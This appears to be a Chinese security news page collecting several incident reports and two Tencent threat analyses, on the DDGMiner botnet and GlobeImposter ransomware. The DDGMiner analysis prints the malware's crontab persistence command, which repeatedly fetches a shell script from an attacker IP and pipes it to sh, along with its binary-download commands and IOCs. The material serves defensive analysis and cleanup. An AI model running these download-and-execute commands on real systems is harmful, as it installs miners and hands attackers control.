分类: 黑客事件

俄罗斯黑客修改 Chrome 和 Firefox 浏览器安装程序以追踪用户

浏览器制造商正在实施一些功能,如HTTPS和TLS加密,以防止站点通过各种技术来跟踪用户。但是,世界各地黑客喜欢与安全专家和软件开发人员一起玩猫捉老鼠的游戏。来自俄罗斯一个特别臭名昭著的团体将计就计,他们在用户安装Web浏览器同时,即时修改这些Web浏览器,为加密流量添加所谓“指纹”功能,以实时跟踪用户和其使用的电脑。 卡巴斯基实验室(Kaspersky Labs)对这种秘密攻击的调查报告显示,黑客设法找到了一种修改Web浏览器的方法,从而使被设计为安全且私有的TLS流量将带有唯一的指纹,以识别用户及其使用的电脑。 这些黑客能够做到这一点的方法几乎令人恐惧。黑客修补了Google Chrome和Mozilla Firefox的安装程序,让浏览器运行时包括该特殊的指纹功能。卡巴斯基无法确定黑客如何以及何时进行修改,但是黑客可能会在用户从合法来源下载安装程序时立即进行修改。 对于某些黑客来说,这是一个相当高的技术要求,因为这意味着黑客需要黑入Internet服务提供商和其网络。但是,对于一个名为Tulsa的黑客组织而言,这可能并不那么困难。Tulsa组织因与俄罗斯政府有联系而闻名,并参与了几起针对ISP的黑客事件。奇怪的是,这种被称为Reductor的恶意软件并未真正用于解密用户的加密流量,因此,这可能是一种隐蔽地跟踪用户网络活动的方法。     (稿源:cnBeta,封面源自网络。)

黑客入侵了一对夫妇的 Nest 设备 将温度调至 90 华氏度并播放低俗音乐

据外媒BGR报道,近日一个奇怪的故事提醒人们将日常家用物品连接到互联网可能带来的风险:黑客最近入侵了密尔沃基一对夫妇的智能家居系统,随后他们开始制造麻烦以获得一点乐趣。 据Fox6Now报道,黑客将这对夫妇的Nest恒温器的温度一直调高到90华氏度(32摄氏度)。当这对夫妇-Lamont和Samantha Westmorland回到闷热的房屋时,立即注意到有些不对劲。报告写道:“恒温器继续升高,然后从厨房的摄像头开始发出声音,然后播放低俗的音乐。” “我的心脏在加速跳动,”Samantha Westmoreland谈到此事时表示。“那时我感到很受侵犯。”最终,这对夫妇更改了他们的Wi-Fi密码,并使他们的设备恢复正常。 虽然Westmorelands似乎将罪魁祸首归咎于他们的Nest产品,但谷歌提供了一份声明,声称该攻击是由于通过一次单独的泄露获得的密码被泄露的结果。 谷歌在声明中表示: Nest没有违反。这些报告基于使用泄露密码(通过其他网站上的漏洞暴露)的客户。在几乎所有情况下,两因素验证都消除了这种类型的安全风险。 Nest用户可以选择迁移到Google帐户,从而可以访问其他工具和自动安全保护,例如可疑活动检测,两步验证和安全检查。数百万的用户已经注册进行两因素验证。 今年早些时候,一名芝加哥男子惊恐地发现,一个能够访问其多个联网设备的黑客正在通过婴儿监视器向其七个月大的婴儿说话。   (稿源:cnBeta,封面源自网络。)

研究发现与俄罗斯情报部门有关的黑客之间很少共享代码

两家安全公司Check Point和Intezer Labs共同撰写了一份报告。这份报告显示,俄罗斯政府资助的黑客组织很少彼此共享代码,他们如果共享代码,这些代码通常是由同一情报机构管理的组织内部代码。 两家公司研究了将近2千个恶意软件样本,这些样本均来自于俄罗斯政府资助的黑客组织。研究人员对这些恶意软件样本之间的关系调查发现,恶意软件之间共享了22000个连接和385万条代码。这项庞大研究工作做出的结论是,人们发现俄罗斯APT(高级持续威胁,用于描述政府支持的黑客组织的术语)之间通常不会彼此共享代码。 此外,在极少数情况下,代码重用通常发生在同一情报服务内部,这表明负责对外国进行网络间谍活动的俄罗斯三个主要机构,它们通常不会进行协作。该报告证实了以前对俄罗斯网络间谍运作进行的新闻调查,也证实了其他外国情报部门在这方面的发现。之前大部分报告发现,俄罗斯所有网络间谍活动,主要由三个俄罗斯FSB(联邦安全局),SVR(外国情报局)和GRU(俄罗斯军事情报总局)负责进行,并且彼此之间没有合作或协调。 俄罗斯政府促进了三个机构之间彼此竞争,这三个机构彼此独立运作,并争夺政府拨款资金。这就导致黑客小组彼此独立开发工具,而不是与同行共享工具。     (稿源:cnBeta,封面源自网络。)

黑客创建虚假退伍军人招聘网站 用恶意软件感染受害者的电脑

据外媒CNET报道,思科Talos团队周二表示,一个黑客组织创建了一个假装帮助美国退伍军人寻找就业机会的虚假老兵招聘网站,并通过恶意软件感染受害者的电脑。Talos团队在博客文章中称,该网站名为hiringmilitaryheroes.com,要求用户下载一个伪造的安装应用程序,该应用程序部署了恶意软件和恶意间谍工具。 攻击者检索到的系统信息包括硬件、固件版本、补丁程序级别、处理器数量、网络配置、域控制器,屏幕大小和管理员名称。思科Talos团队称:“这是与机器有关的大量信息,使攻击者为进行其他攻击做好了充分的准备。”该团队认为,这有可能影响很多人。 “美国人很快就回馈和支持退伍军人……这个网站极有可能在社交媒体上获得关注,用户可以在社交媒体上分享链接,以期支持退伍军人。” 思科和赛门铁克表示,该黑客组织被称为Tortoiseshell,其最近攻击了沙特的IT供应商。 思科没有立即回应有关该网站是否仍在正常运行以及是否有人受到影响的置评请求。   (稿源:cnBeta,封面源自网络。)

黑客利用“Simjacker”漏洞窃取手机数据 或影响 10 亿人

据TNW报道,网络安全研究人员警告称,SIM卡存在一个严重的漏洞,使得远程攻击者可以在用户不知情的情况下发送短信攻击目标手机并监控受害者。都柏林的AdaptiveMobile Security公司表示,这个被称为“Simjacker”的漏洞已经被一家间谍软件供应商利用了至少两年的时间,不过该安全公司并未透露利用这一漏洞公司的名称以及受害者信息。 据称,“Simjacker”漏洞攻击包括向手机发送一条短信,短信中包含一种特定类型的类似间谍软件的代码,然后手机会指示手机内的SIM卡控制手机,检索并执行敏感命令。这一漏洞存在于称为 S@T的浏览器中,该浏览器作为GSM 普遍使用的手机应用工具包(STK)的一部分,嵌入大多数手机SIM卡中,为客户提供增值服务。 AdaptiveMobile 表示,至少有 30 个国家的移动运营商积极使用 S@T 浏览器技术,总人数超过 10 亿。这就意味着,在全球或有逾10 亿手机用户可能会受到影响。 研究人员透露,攻击每天都在发生,在 7 天的时间里,有几个电话号码被追踪了数百次。 虽然检测到主要攻击涉及到的是盗取手机用户的位置,但现在Simjacker 攻击范围已经扩大到欺诈、诈骗电话、资讯泄露、拒绝服务攻击,以至是间谍活动等等。   (稿源:cnBeta,封面源自网络。)

警惕:DDG 挖矿僵尸网络利用 SSH 弱口令爆破攻击 Linux 服务器

感谢腾讯御见威胁情报中心来稿! 原文:https://mp.weixin.qq.com/s/twR_Jh3aT8n7be3kbmyDhA   一、背景 腾讯安全专家在为某企业客户进行例行安全巡检过程中,发现客户部署的腾讯御界高级威胁检测系统出现了SSH服务失陷感知信息。在征得客户同意后对客户机器进行远程取证,并结合御界的关键日志进行分析,我们发现这是一起针对SSH服务器弱口令爆破攻击事件。由于发现及时,工程师及时协助客户进行隔离及杀毒,并未造成损失。 腾讯安全御见威胁情报中心对本次攻击事件展开调查,结果发现,这是由大型挖矿僵尸网络DDGMiner发起的攻击事件。DDGMiner是最早于2017年被发现的挖矿僵尸网络,其特点为扫描攻击 SSH服务、Redis 数据库和OrientDB数据库等服务器,并在攻陷的服务器上植入挖矿木马挖掘门罗币获利。从病毒服务器的目录中last modified字段可以看到,本次攻击中样本的更新时间为2019-08-29,目前为4004版本。 对样本进行分析后,发现与此前版本不同的是,样本中新增了针对Nexus Repository Manager漏洞、Supervisord漏洞的利用攻击代码,其攻击流程大致如下: 根据腾讯云鼎实验室监测数据,云上主机遭受来自最新版本DDGMiner的攻击流量从2019.08.29开始出现,在8月30日到达峰值,8月31日到9月1日下降到一定范围之后趋于平稳,大部分攻击流量被有效拦截。 而在少量失陷主机中,90%以上遭到SSH弱口令爆破入侵,由此可见DDGMiner的主要传播方式仍然为SSH爆破。腾讯安全提醒企业用户务必使用高强度的SSH、Redis登录密码,避免因设置不当而遭受攻击造成不必要的损失。 二、详细分析 黑客在通过弱口令爆破或漏洞攻击入侵后首先下载Shell脚本i.sh,并将其安装为crontab定时任务每15分钟执行一次。 mkdir -p /var/spool/cron/crontabsecho "" > /var/spool/cron/rootecho "*/15 * * * * (/usr/bin/nfosfa4||/usr/libexec/nfosfa4||/usr/local/bin/nfosfa4||/tmp/nfosfa4||curl -fsSL -m180 http://68.183.140.39/i.sh||wget -q -T180 -O- http://68.183.140.39/i.sh) | sh" >> /var/spool/cron/rootcp -f /var/spool/cron/root /var/spool/cron/crontabs/root 然后检测是否已经存在进程nfosfa4,若存在则杀死进程并删除对应的文件,然后从服务器下载ddgs.$(uname -m)保存为nfosfa4,其中uname –m用来获取系统类型并映射到文件名。最后通过chmod +x给nfosfa4赋予可执行权限,从而完成木马的下载更新。 ps auxf | grep -v grep | grep nfosfa4 || rm -rf nfosfa4if [ ! -f "nfosfa4" ]; then curl -fsSL -m1800 http://68.183.140.39/static/4004/ddgs.$(uname -m) -o nfosfa4||wget -q -T1800 http://68.183.140.39/static/4004/ddgs.$(uname -m) -O nfosfa4fichmod +x nfosfa4 接着查找并杀死多个历史版本的病毒进程,进程名分别为nfosbcb、nfosbcc、nfosbcd、nfosbce、nfosfa0、nfosfa1、nfosfa2。 ps auxf | grep -v grep | grep nfosbcb | awk '{print $2}' | xargs kill -9ps auxf | grep -v grep | grep nfosbcc | awk '{print $2}' | xargs kill -9ps auxf | grep -v grep | grep nfosbcd | awk '{print $2}' | xargs kill -9ps auxf | grep -v grep | grep nfosbce | awk '{print $2}' | xargs kill -9ps auxf | grep -v grep | grep nfosfa0 | awk '{print $2}' | xargs kill -9ps auxf | grep -v grep | grep nfosfa1 | awk '{print $2}' | xargs kill -9ps auxf | grep -v grep | grep nfosfa2 | awk '{print $2}' | xargs kill -9 然后启动病毒的最新版本nfosfa4,病毒被存放于以下四个目录之一。 /usr/bin/nfosfa4 /usr/libexec/nfosfa4 /usr/local/bin/nfosfa4 /tmp/nfosfa4 nfosfa4是采用golang语言开发,编译成基于Linux的ELF可执行文件,并且采用UPX加壳保护。golang语言是一款开源编程系统,其优点为简单可靠,支持夸平台编译等。golang语言非常适合服务器编程、分布式系统和数据库相关的网络编程,而DDGMiner恰好符合这些特点。 为了便于分析,我们通过Linux下的UPX脱壳工具进行脱壳,然后使用IDAGolangHelper脚本在IDA中对函数进行重命名。处理之后可以比较清晰的看到样本中漏洞攻击、挖矿、清除挖矿竞品等功能。 在还原后的函数中,可以看到针对SSH爆破、以及针对Redis服务器、Supervisord服务器、Nexus Repository Manager服务器的漏洞利用攻击代码。 样本还使用了hashicorp的go开源库memberlist来构建分布式网络,memberlist是用来管理分布式集群内节点发现、节点失效探测、节点列表的开源程序(github: https://github.com/hashicorp/memberlist)。样本初次到达受害机时,会获取本地节点的地址和状态信息,然后尝试连接到内置的ip列表中的远端节点从而加入远端的集群。 memberlist利用被称为“疫情传播算法”的Gossip协议在僵尸网络集群中同步数据。Gossip 过程由种子节点发起,当一个种子节点有状态需要更新到网络中的其他节点时,它就会随机的选择周围几个节点散播消息,收到消息的节点也会重复该过程,直至最终网络中所有的节点都收到了消息。病毒通过这个过程将某个节点上获得更新的挖矿木马和攻击脚本同步到所有节点。 最后,在挖矿功能部分,通过main_ptr_miner_Download函数下载,main_ptr_miner_Update更新,main_ptr_miner_CheckMd5校验矿机Md5值,以及通过main_ptr_miner_Run启动矿机,并且通过调用main_ptr_miner_killOtherMiner对其他挖矿木马进行清除。 三、安全建议 1、使用高强度的Redis登陆密码、SSH登陆密码, 必要时添加防火墙规则避免其他非信任来源ip访问。 2、及时修复Redis、Nexus Repository Manager、Supervisord服务相关的高危漏洞。 3、已中毒的linux服务器可采用以下手动清理方案。 a)、crontab如果如果包含以下内容,进行清理: "*/15 * * * * (/usr/bin/nfosfa4||/usr/libexec/nfosfa4||/usr/local/bin/nfosfa4||/tmp/nfosfa4||curl -fsSL -m180 http://68.183.140.39/i.sh||wget -q -T180 -O- http://68.183.140.39/i.sh) | sh" b)、/var/spool/cron/root文件,如果包含以下内容,进行清理: "*/15 * * * * (/usr/bin/nfosfa4||/usr/libexec/nfosfa4||/usr/local/bin/nfosfa4||/tmp/nfosfa4||curl -fsSL -m180 http://68.183.140.39/i.sh||wget -q -T180 -O- http://68.183.140.39/i.sh) | sh" c)、/var/spool/cron/crontabs/root文件,如果包含以下内容,进行清理: "*/15 * * * * (/usr/bin/nfosfa4||/usr/libexec/nfosfa4||/usr/local/bin/nfosfa4||/tmp/nfosfa4||curl -fsSL -m180 http://68.183.140.39/i.sh||wget -q -T180 -O- http://68.183.140.39/i.sh) | sh" d)、删除以下文件 /usr/bin/nfosfa4 /usr/libexec/nfosfa4 /usr/local/bin/nfosfa4 /tmp/nfosfa4 /usr/bin/betsbcc /usr/libexec/betsbcc /usr/local/bin/betsbcc /tmp/betsbcc /usr/bin/brhjbcc /usr/libexec/brhjbcc /usr/local/bin/brhjbcc /tmp/brhjbcc e)删除/tmp目录下文件 qW3xT, qW3xT.1, qW3xT.2, qW3xT.3, qW3xT.4, ddgs.3010, ddgs.3011, ddgs.3013, ddgs.3016, 2t3ik, 2t3ik.m, 2t3ik.p, 2t3ik.s, imWBR1, imWBR1.ig, wnTKYg, wnTKYg.noaes, fmt.3018 4、使用腾讯御界高级威胁检测系统检测未知黑客的各种可疑攻击行为。御界高级威胁检测系统,是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。 IOCs IP 68.183.140.39 URL hxxp://68.183.140.39:8000/static/4004/ddgs.x86_64 hxxp://68.183.140.39:8000/static/4004/ddgs.i686 hxxp://68.183.140.39:8000/i.sh MD5 bdfa1c43b3e03880d718609af3b9648f 76309d50ad8412954ca87355274bd8ff 4f0ef26b713d28469d08a8a833339e77 参考链接: https://blog.netlab.360.com/fast-analyze-ddg-v3021-and-v3022/

在维基百科遭遇 DDoS 攻击后 维基媒体宣布获 250 万美元资金支持

据外媒报道,上周五,维基百科在遭遇恶意DDOS攻击后在数个国家下线。维基媒体基金会之后证实了这一事件并开始着手调查。很快,维基百科在这些国家恢复正常。不过几日后该非营利组织仍未就这起网络攻击事件是否已经得到彻底解决做出证实。 现在,维基媒体宣布克雷格·纽马克慈善基金会(Craig Newmark Philanthropies)获得了250万美元的资金支持,这在时间点上是一个相当有趣的举动。据悉,这笔来自Craigslist创始人基金会的捐款则是为了帮助维基媒体保护其项目和志愿者免受网络威胁。 维基媒体基金会安全主管John Bennett就这笔投资的必要性发表了以下言论:“维基百科拥有数亿用户的十大网站的持续成功使其成为了破坏、黑客攻击和其他网络安全威胁的目标,这些威胁损害到了自由知识运动和社区。这就是为什么我们在问题出现之前就积极地与之斗争。这笔投资将使我们能进一步扩大我们的安全计划进而识别当前和未来的威胁、制定有效的对策,并改善我们的整体安全控制。” 这项慈善投资将有助于提供对该组织服务包括维基百科的安全访问。另外,该非营利组织还指出,这笔捐款可以更好地缓解上周发生的袭击事件。   (稿源:cnBeta,封面源自网络。)

GlobeImposter 攻破某域控制器,局域网内横向扩散致企业损失惨重

感谢腾讯御见威胁情报中心来稿! 原文: https://mp.weixin.qq.com/s/M7tUw8E_qsqK7HxMyxS7Yw   一、事件回顾 近日,腾讯安全御见威胁情报中心接到某企业求助,称其局域网内8台服务器遭受勒索病毒攻击。工程师现场勘察后,确认该事件为GlobeImposter勒索病毒通过外网爆破入侵该公司域控服务器,随后利用该机器作为跳板机,登录到该公司内其它机器再次进行勒索加密。 黑客入侵示意图 腾讯安全专家通过排查被攻击公司的染毒机器,可知该公司染毒的第一台服务器为域管理服务器,该机器由于开启了远程桌面且由于其IP地址暴露在外网从而被爆破入侵。 由于该服务器为该公司的域控制器,被入侵控制之后出现灾难性后果:攻击者可任意登录局域网内其它机器,通常情况下,域管理员具备登录域内所有计算机的权限。攻击者控制域控制器之后,就有能力在任意一台计算机运行任意程序,可能导致企业大量机密信息泄露。本例中,攻击者选择其中8台电脑实施勒索病毒加密攻击,灾情进一步被放大,使企业遭受惨重损失。 同时在被攻击机器上找到了安全软件对抗工具ProcessHacker,黑客通常使用该工具与机器上的安全软件做对抗。 内网嗅探扫描工具,黑客可通过该类工具快速获取当前局域网内其他活动机器尝试攻击 密码抓取工具,使用该类工具,黑客可获取本地机器相关口令,作为内网横向传播过程中的弱口令使用。由于部分企业内网安全措施薄弱,多台服务器使用同一密码,此类攻击手法通常也简单直接且有效。 还有病毒运行后的留下的相关日志文件,疑似病毒的副本文件 观察后可知受害电脑已感染GlobeImposter-865系列病毒 GlobeImposter该系列病毒版本加密文件后会添加.主神865扩展后缀,同时留下名为HOW TO BACK YOUR FILES.exe的勒索说明程序 由于GlobeImposter通常使用RDP爆破入侵加密企业服务器,所以当加密文件完成后,该病毒除删除系统卷影外,还会清除其注册表中的RDP连接信息,同时加密前会结束大量的数据库相关服务进程,防止其造成的文件占用无法加密。 病毒加密时使用以下白名单关键词做过滤 windows bootmgr temp pagefile.sys boot ids.txt ntuser.dat perflogs MSBuild 同时会优先加密大量文件类型,主要为数据价值较高的文件类型 包括以下数十种文件格式均被加密: bak、ba_、dbb、vmdk、rar、zip、tgz、vbox、vdi、vhd、vhdx、avhd、db、db2、db3、dbf、mdf、mdb、sql、sqlite、sqlite3、sqlitedb、xml、$er、4dd、4dl、^^^、abs、abx、accdb、accdc、accde、accdr、accdt、accdw、accft、adb、adb、ade、adf、adn、adp、alf、ask、btr、cat、cdb、ckp、cma、cpd、dacpac、dad、dadiagrams、daschema、db-journal、db-shm、db-wal、dbc、dbs、dbt、dbv、dbx、dcb、dct、dcx、ddl、dlis、dp1、dqy、dsk、dsn、dtsx、dxl、eco、ecx、edb、epim、fcd、fdb、fic、flexolibrary、fm5、fmp、fmp12、fmpsl、fol、fp3、fp4、fp5、fp7、fpt、frm、gdb、gdb、grdb、gwi、hdb、his、ib、idb、ihx、itdb、itw、jet、jtx、kdb、kexi、kexic、kexis、lgc、lwx、maf、maq、mar、marshal、mas、mav、maw、mdbhtml、mdn、mdt、mfd、mpdmrg、mud、mwb、myd、ndf、nnt、nrmlib、ns2、ns3、ns4、nsf、nv、nv2、nwdb、nyf、odb、odb、oqy、ora、orx、owc、p96、p97、pan、pdb、pdm、pnz、qry、qvd、rbf、rctd、rod、rodx、rpd、rsd、sas7bdat、sbf、scx、sdb、sdc、sdf、sis、spq、te、teacher、tmd、tps、trc、trc、trm、udb、udl、usr、v12、vis、vpd、vvv、wdb、wmdb、wrk、xdb、xld、xmlff 二、关于GlobeImposter勒索病毒家族 GlobeImposter出现于2017年中,加密文件完成后会留下名为HOW TO BACK YOUR FILES.(txt html exe)类型的勒索说明文件。该病毒加密扩展后缀繁多,其规模使用且感染泛滥的类型有12生肖4444,12主神666,以及现在较多的12主神865等系列。由于该病毒出现至今仍然无有效的解密工具,因此我们提醒各政企机构提高警惕。 GloeImposter泛滥使用后缀(不局限于以下类型): 4444系列: .ox4444 .help4444 .all4444 .china4444 .monkey4444 .snake4444 .Rat4444 .Tiger4444 .Rabbit4444 .Dragon4444 .Horse4444 .Goat4444 .Rooster4444 .Dog4444 .Pig4444 666系列: .Zeus666 .Hera666 .Poseidon666 .Hades666 .Hestia666 .Ares666 .Athene666 .Hermes666 .Hephaestus666 .Apollo666 .Aphrodite666 .Artemis666 865系列: .Zeus865 .Hera865 .Poseidon865 .Hades865 .Hestia865 .Ares865 .Athene865 .Hermes865 .Hephaestus865 .Apollo865 .Aphrodite865 .Artemis865 观察近期GolbeImposter感染趋势可知,该病毒虽然在月中有感染下降,但观察其整体波峰,可得其整体趋势依然呈间歇性上涨。通过观察其感染行业分布,也可知该病毒在国内也从早期的广撒网模式,改变为现在主要针对数据价值较高行业的服务器实施攻击,从而提升其勒索赎金成功率。 三、安全建议 企业用户: 重点防御措施 1.针对该勒索病毒主要通过RDP(远程桌面服务)爆破攻击的特点,建议企业立即修改远程桌面连接使用弱口令,复杂口令可以减少服务器被黑客爆破成功的机会。管理员应对远程桌面服务使用的IP地址进行必要限制,或修改默认的3389端口为自定义,配置防火墙策略,阻止攻击者IP连接。 2.建议企业网管配置相应的域安全策略,通过修改计算机组策略,配置帐户锁定策略,限制登录失败次数,默认为不受限,我们可以将其限制为3-10以内。 操作步骤: 运行,gpedit.msc,打开组策略编辑器,在计算机设置->安全设置->帐户策略->帐户锁定策略,将帐户锁定的阈值,设定的稍小一些。 3.服务器使用腾讯御点终端安全管理系统或腾讯电脑管家拦截病毒,并启用文档守护者功能备份重要文档。 4.企业用户可以使用腾讯御界高级威胁检测系统,腾讯御界高级威胁检测系统可以及时检测发现黑客针对内网的爆破攻击活动,可以及时提醒网管注意。 5. 已经感染勒索病毒的用户,请参考(https://s.tencent.com/ls/ )页面上勒索病毒应急手册进行处置。 通用的安全措施 防止入侵者爆破成功之后在内网横向扩散: 1.建议企业内网关闭不必要的网络端口,降低黑客在内网攻击传播的成功率。如:445、135,139等,对3389,5900等端口可进行白名单配置,只允许白名单内的IP连接登陆。 2、尽量关闭不必要的文件共享,如有需要,请使用ACL和强密码保护来限制访问权限,禁用对共享文件夹的匿名访问。 3、采用高强度的密码,避免使用弱口令密码,并定期更换密码。建议服务器密码使用高强度且无规律密码,并且强制要求每个服务器使用不同密码管理。同样,强密码策略也可以通过域安全策略来统一配置强制全网执行。 4、对没有互联需求的服务器/工作站内部访问设置相应控制,避免可连外网服务器被攻击后作为跳板进一步攻击其他服务器。 5、对重要文件和数据(数据库等数据)进行定期非本地备份。 6、在终端/服务器部署专业安全防护软件,Web服务器可考虑部署在腾讯云等具备专业安全防护能力的云服务。 7、建议全网安装御点终端安全管理系统(https://s.tencent.com/product/yd/index.html)。御点终端安全管理系统具备终端杀毒统一管控、修复漏洞统一管控,以及策略管控等全方位的安全管理功能,可帮助企业管理者全面了解、管理企业内网安全状况、保护企业安全。 个人用户: 1、启用腾讯电脑管家,勿随意打开陌生邮件,关闭Office执行宏代码。 2、打开电脑管家的文档守护者功能,利用磁盘冗余空间自动备份数据文档,即使发生意外,数据也可有备无患。 IOCs MD5: a7d182ac1e20754e3881f7471954fcd4 参考链接: 全面防御勒索病毒 https://s.tencent.com/ls/

维基百科遭遇 DDoS 攻击,NCSC 提醒其他公司加强防范

在维基百科遭遇 DDoS 攻击并停运后,NCSC(英国国家网络安全中心)敦促其他组织对 DoS 攻击组织采取应对措施。 根据维基媒体德国公司(Wikimedia Deutschland),大规模 DDoS 攻击导致维基百科的大多数服务器瘫痪,美国,欧洲,英国和中东地区的用户在 9 月 6 日和 9 月 7 日期间无法进入维基百科网站。 根据非政府组织 NetBlocks,维基百科的网站大约停机了 9 个小时,其中 DDoS 攻击的目标是美国和欧洲的维基媒体基础设施。   恢复正常运行 “今天,维基百科遭遇恶意攻击,导致部分国家的用户在相当一段时间内无法访问我们的网站。”  维基百科的非营利性基金会发表推特称,“攻击仍在持续。为了使用户可以正常访问我们的网站,我们的团队正在努力阻止攻击。” “在遭遇此次攻击后,维基媒体社区和维基媒体基金会已经创建了专门的系统和员工来定期监控和解决风险。我们会从问题中吸取经验,并且提高防范能力。” 维基媒体基金会称。 NSCC强调,为了更好地应对 DoS 攻击,企业应将其运行模式设置为可扩展的,以便在大量流量涌入网站时,基础设施可以自动核算并分配更多资源来容纳这些流量。   消息来源:BleepingComputer, 译者:r4938n,校审:吴烦恼 本文由 HackerNews.cc 翻译整理,封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

iOS 天气应用 UVLens 疑遭黑:发出极度不适宜的通知消息

据外媒报道,当地时间9月3日早上,iOS App Store一款叫UVLens的天气应用向所有用户发送了极度不适合的色情通知,这一异常情况暗示了该应用可能遭到黑客攻击或受到了某种方式的威胁。许多收到该条通知的用户在Twitter上抱怨了这一情况,信息内容跟天气没有任何关系但却足以让收到的人震惊。 UVLens是一款简单的应用,其为那些担心暴露在阳光下的人提供每小时的紫外线数据预测。由于这是一款通用应用,所以它很可能已经被4岁以上的儿童下载使用。 UVLens似乎已经将这一条通知发送给了所有用户,其中一名用户说,当她点击该条通知时界面试图打开一个二级窗口。 对此,UVLens发送了一个通知,为这一不当消息推送向用户致歉。不过这家公司表示,这条信息并非由其团队发出,针对这一情况他们正在展开调查。 另外,UVLens还告诉外媒MacRumors,它使用的第三方推送通知服务受到了威胁,其允许垃圾邮件发送者通过网络发送不恰当的通知,其中包括了发送给UVLens用户。UVLens方面还表示,他们已经采取措施防止此类事件再次发生。   (稿源:cnBeta,封面源自网络。)